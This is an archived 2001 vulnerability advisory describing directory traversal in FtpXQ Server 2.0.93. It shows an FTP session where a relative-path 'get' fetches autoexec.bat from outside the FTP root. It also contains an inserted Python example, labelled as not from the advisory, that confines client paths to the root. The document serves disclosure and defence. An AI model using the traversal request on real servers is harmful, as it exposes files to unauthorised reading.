SECURITYVULNS:DOC:1336
Mar 01, 2001 - 12:00 a.m.

Vulnerability in FtpXQ Server


----- Begin Hush Signed Message from [email protected] -----

Vulnerability in FtpXQ Server

Overview

FtpXQ Server 2.0.93 is an ftp server available from
http://www.datawizard.net and http://www.download.com. A vulnerability
exists which allows an attacker to download files outside the ftp
root.

Details

The following is an illustration of the problem. An ftp root of
"c:\directory\directory" was used.

% ftp localhost
Connected to xxxxxxxxx.rh.rit.edu.
220 DataWizard Technologies' FtpXQ FTP Server. (Version 2.0.93).
User (xxxxxxxxx.rh.rit.edu:(none)): test
331 OK need password.
Password:
230 Welcome to DataWizard Technologies' FtpXQ FTP Server.
ftp> pwd
257 Remote directory is "/directory/directory/"
ftp> cd …
550 Requested file action not taken—user does not have access.
ftp> get …/…/autoexec.bat
200 OK
150 Opening data connection.
226 Transfer completed.
ftp: 383 bytes received in 0.06Seconds 6.38Kbytes/sec.
ftp>
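
In the session above the directory change is refused with 550 while the file retrieval with a relative path is served, so the root check is evidently not applied to every command. The following is an added example, not code from the advisory or from the vendor, of a single path-resolution routine that every path-taking FTP command would pass through. The names `resolve_in_root`, `handle` and `PathEscape` are hypothetical, and the session's current directory is assumed to be stored relative to the FTP root.

```python
import ntpath

# Constructed sample root, matching the one used in the advisory's illustration.
FTP_ROOT = r"c:\directory\directory"


class PathEscape(Exception):
    """Raised when a client-supplied path resolves outside the FTP root."""


def resolve_in_root(root, cwd, arg):
    """Map a client path to a local Windows path, or raise PathEscape.

    root: local directory served as the FTP root
    cwd:  session's current directory, relative to root, '/'-separated
    arg:  raw path argument from the client (CWD, RETR, STOR, ...)
    """
    arg = arg.replace("\\", "/")
    # Absolute client paths restart at the FTP root, not at cwd.
    parts = [] if arg.startswith("/") else [p for p in cwd.split("/") if p]
    for comp in arg.split("/"):
        if comp in ("", "."):
            continue
        if comp == "..":
            if not parts:
                raise PathEscape(arg)  # would climb above the root
            parts.pop()
        elif set(comp) == {"."} or ":" in comp or "\x00" in comp:
            # Dot-only names longer than "..", drive or stream separators and
            # NUL bytes have platform-dependent meaning, so refuse them.
            raise PathEscape(arg)
        else:
            parts.append(comp)
    root_abs = ntpath.normcase(ntpath.normpath(root))
    full = ntpath.normcase(ntpath.normpath(ntpath.join(root_abs, *parts)))
    # Final containment check on the canonical form (defence in depth).
    if full != root_abs and not full.startswith(root_abs.rstrip("\\") + "\\"):
        raise PathEscape(arg)
    return full


def handle(command, cwd, arg):
    """Return an FTP reply code; every path-taking verb shares one check."""
    try:
        resolve_in_root(FTP_ROOT, cwd, arg)
    except PathEscape:
        return 550
    return 250 if command == "CWD" else 150
```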

Solution

No quick fix is possible.

Vendor Status

DataWizard Technologies, Inc. was contacted via
<[email protected]>
on Tuesday, February 20, 2001. No reply was received.

- Joe Testa ( e-mail: [email protected] / AIM: LordSpankatron )

This message has been signed with a Hush Digital Signature.
To verify the signature, please go to www.hush.com/tools